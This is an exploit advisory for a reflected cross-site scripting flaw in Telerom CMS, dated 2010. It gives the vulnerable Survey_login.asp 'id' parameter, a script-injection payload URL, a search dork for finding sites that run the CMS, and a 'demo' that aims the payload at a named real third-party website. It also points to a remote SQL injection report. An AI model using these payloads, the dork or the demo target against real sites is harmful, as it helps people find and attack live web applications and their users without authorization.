Text : ########
[+] Exploit Title: Telerom Cms Cross Site Scripting Vulnerability
[+] Date: 2010-02-11
[+] Author: Ashiyane Digital Security Members (Cair3x)
[+] Software Link: http://www.telerom.co.il/
[+] Version: -
[+] Tested on: -
[+] Dork: Site powered by [ Telerom ] ,Israel - 2005
########
Vulnerable script: Survey_login.asp?id=[Xss]
[ Vulnerability ]
http://www.Target.co.il/site/Survey_login.asp?id=[Xss]
[ Exploit ]
http://www.Target.co.il/site/Survey_login.asp?id="><script>al
ert(0)</script>
[ Demo ]
http://www.medika.co.il/site/Survey_login.asp?id="><script>al
ert(0)</script>
[Oder]
Reamot Sql Injection In portal :
http://securityreason.com/wlb_show/WLB-2010020041
########
BY : Cair3x [Cair3x.Support@Gmail.com]
Web Site : Ashiyane.org
Forum : Http://Ashiyane.org/forums/
[+] Greetz to All Ashiyane Digital Security Member (And Virangar Good
Frinds)
########